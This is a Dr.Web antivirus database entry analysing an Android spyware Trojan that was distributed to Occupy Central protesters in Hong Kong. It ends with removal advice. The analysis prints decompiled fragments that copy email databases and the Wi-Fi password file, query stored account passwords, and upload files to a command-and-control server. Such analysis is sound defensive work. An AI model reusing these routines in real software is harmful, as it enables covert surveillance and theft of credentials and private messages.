My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets



Added to the Dr.Web virus database: 2015-03-18

Virus description added:

This Trojan for Android is designed to spy on protesters of the Occupy Central movement in Hong Kong. This malicious program gathers most detailed information about the users, including their location and circle of contacts and other confidential information. It is distributed as a program for coordination of protest activities.


When launched, the program deletes its icon from the home screen and later operates as the system service StreamService, which performs all malicious activities.

The control servers are located at the following addresses:

  • mm.[xxxx]
  • xx.xx.11.75

When connected to the command and control center, Android.SpyHK.1.origin checks the availability of all these domains, however, priority is given to the first one. Connecting to available server's port 1430, Android.SpyHK.1.origin by means of the socket downloads the detailed information on the infected device, namely:

  • IMEI
  • Phone number
  • Device model
  • Operator
  • SIM card ID
  • Data on the maximum processor frequency
  • Data on RAM amount
  • OS version
  • Contents of system logs
  • MAC address
  • Available Internet connection
  • Current IP address

In response, the Trojan receives control commands as encrypted bytes:

try {
            v2_9 = new byte[v2_7];
            v3_3 = b.a(v2_9);	    //the first 2 bytes contain the command.
            v4 = new byte[2];
            v16 = b.a(v4);          //the subsequent 2 bytes—
				    //identifier that is sent back to the command and
				    //control server along with the report.
            v2_9 = new byte[4];
            int v5 = b.c(v2_9);     //the subsequent 4 bytes indicate the size 
				    //of the command parameter, that is extracted later
            ByteArrayOutputStream v6 = new ByteArrayOutputStream(v5);
            byte[] v7 = new byte[1024];
            v2_7 = 0;
            while(v2_7 < v5) {
                int v8 =;
                v2_7 += v8;
                v6.write(v7, 0, v8);

Android.SpyHK.1.origin can carry out the following actions on an infected device:

  • Read the contents of a specified directory (names, size, and last modified dates for files and folders in the directory)
  • Acquire the device's GPS coordinates
  • Add an entry to the log file
  • Output a message with the specified text on the screen
  • Call a specified number
  • Gather information about the device
  • Execute a specified shell script
  • Get an extended contact list (including names, phone numbers and email addresses)
  • Gain access to the SMS correspondence
  • Get the call history
  • Add specific phone numbers to the list of individuals being eavesdropped on
  • Obtain the current list of individuals being eavesdropped on
  • Download a file from a designated web address
  • Delete a specified file from the device
  • Upload a specified file to the command and control server
  • Activate the voice recorder after a specified time interval
  • Activate voice recording and simultaneously stream the recording onto the server's socket
  • Stop voice recording
  • Upload the mail database of the default mail client onto the server
  • Acquire browsing history
  • Send information about files and directories found on the SD card to the command and control server
  • Execute multiple commands to gather sensitive information and send it to the server

The list of phone numbers for eavesdropping is downloaded from the command and control server and stored at /data/data/com.v1/.record/. This list has the following structure:

"in_/out_" + PhoneReceiver.c + "_" + new SimpleDateFormat("yyyyMMdd_HHmmss").format(new Date(

Here in_ provides incoming call values, while out_ contains values for outbound calls. "PhoneReceiver.c" indicates the target phone number.

To acquire information about email correspondence, Android.SpyHK.1.origin copies all available database files of the default mail client into its local directory.

public final void run() {
        new a();
        a.a("cat /data/data/ > 
        new a();
        a.a("cat /data/data/ > 
        new a();
        a.a("chmod 777 /data/data/com.v1/email.db");
        new a();
        a.a("chmod 777 /data/data/com.v1/emailbody.db");

Then the program aggregates the acquired information in two files, /data/data/com.v1/emailAccount.txt и /data/data/com.v1/email.html.

Information about email accounts associated with the device, including the corresponding email address, login and encrypted password is stored in the file Account.txt:

query("HostAuth", new String[]{"address", "login", "password"}, null, null, null, null, null)

The file email.html contains detailed information about email cache including message recipients, subject, time stamp of sending and contents of the emails.

query("Message", new String[]{"_id", "displayName", "subject", "timeStamp", 
"fromList", "toList"}, null, null, null, null, null);
query("Body", new String[]{"htmlContent"}, "messageKey = ?", 
new String[]{v11.getString(v11.getColumnIndex("_id"))}, null, null, null);

The file email.html is formatted as an html document:

v10.append(":" + v11.getString(v11.getColumnIndex("fromList")));
v10.append(":" + v11.getString(v11.getColumnIndex("toList")));
v10.append(":" + v9.format(newDate(Long.valueOf(Long.parseLong(v11.getString(
v10.append(":" + v11.getString(v11.getColumnIndex("subject")));
Cursor v2_1 = v1_3.query("Body", new String[]{"htmlContent"}, "messageKey = ?", 
                          new String[]{v11.getString(v11.getColumnIndex("_id"))},
			  null, null, null);
if(v2_1.moveToNext()) {
v10.append("<hr color=red/><br/>");

The files emailAccount.txt, email.html, email.db, and emailbody.db are uploaded to the remote server.

The following routine is used to acquire information about data stored on the memory card:

private void b(String arg6) {      // значение "arg6" соответствует "/sdcard/"
        File[] v2 = new File(arg6).listFiles();
        if(v2 != null) {
            int v0;
            for(v0 = 0; v0 < v2.length; ++v0) {
                try {
                    if(v2[v0].isDirectory()) {
                        e.a.write(String.valueOf(v2[v0].getAbsolutePath()) + "/");
                    else {
                catch(IOException v1) {
                if(v2[v0].isDirectory()) {

If the malware executes an instruction to gather general information, Android.SpyHK.1.origin will send the following information to the server:

  • Information about the infected device
  • Available contact information
  • Call history
  • SMS correspondence
  • Browser history
  • Email account information
  • information about the files on the memory card
  • Available information about Wi-Fi networks including access passwords

Data related to Wi-Fi is retrieved using the following routine:

v3_1 = "/data/data/com.v1/" +
                        .lastIndexOf("/") + 1);
                new com.v1.a.a();
                com.v1.a.a.a("cat " + "/data/misc/wifi/wpa_supplicant.conf" + " > " + v3_1);
                new com.v1.a.a();
                com.v1.a.a.a("chmod 777 " + v3_1);

Android.SpyHK.1.origin can exploit a known vulnerability of the power control widget to enable the device's GPS receiver. As the result, in some cases the malicious program can acquire GPS coordinates, even if the receiver has been disabled by the device's owner:

Intent v0 = new Intent();
        try {
            PendingIntent.getBroadcast(this.b, 0, v0, 0).send();

Also, the Trojan uses the following routines for operations with local files:

v2_10 = b.b(v2_9);
v3_1 = "/data/data/com.v1/" + v2_10.substring(v2_10.lastIndexOf("/") + 1);
new com.v1.a.a();
com.v1.a.a.a("cat " + v2_10 + " > " + v3_1);   //overwrite the contents of a specified file 
from its directory to a temporary file new com.v1.a.a(); com.v1.a.a.a("chmod 777 " + v3_1); if((new File(v3_1).exists()) && new File(v3_1).length() != 0) { new g(this, v3_1, v19.h()).start(); //sends a temporary file to the command and control server }

Curing recommendations


  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

© Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies